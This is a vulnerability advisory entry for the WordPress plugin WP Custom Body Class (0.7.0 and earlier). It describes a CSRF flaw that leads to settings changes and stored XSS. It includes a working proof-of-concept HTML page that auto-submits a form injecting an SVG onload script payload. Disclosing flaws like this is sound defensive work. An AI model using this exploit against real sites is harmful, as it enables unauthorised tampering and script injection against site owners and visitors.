WP Custom Body Class <= 0.7.0 - CSRF to Stored XSS and Settings Update



Description
Lack of CSRF check and sanitisation when updating the plugin's settings could lead to unauthorised settings update as well as stored XSS issues

XSS fixed in 0.7.0. CSRF still there - vendor contacted
CSRF fixed in 0.7.1
Proof of Concept
<html>
  <body onload="document.forms[0].submit()">
    <form action="https://<BLOG>/wp-admin/options-general.php?page=custom_body_class" method="POST">
      <input type="hidden" name="global_class" value='"><svg/onload=alert(/XSS/)>' />
      <input type="hidden" name="enable_autocomplete" value="1"/>
    </form>
  </body>
</html>

Affects Plugin

fixed in version 0.7.1

References

URL https://plugins.trac.wordpress.org/changeset/2118841

Classification

Type MULTI

Miscellaneous

Views 2559
Verified Yes
WPVDB ID 9456

Timeline

Publicly Published 2019-07-08 (4 months ago)
Added 2019-07-15 (4 months ago)
Last Updated 2019-07-16 (4 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin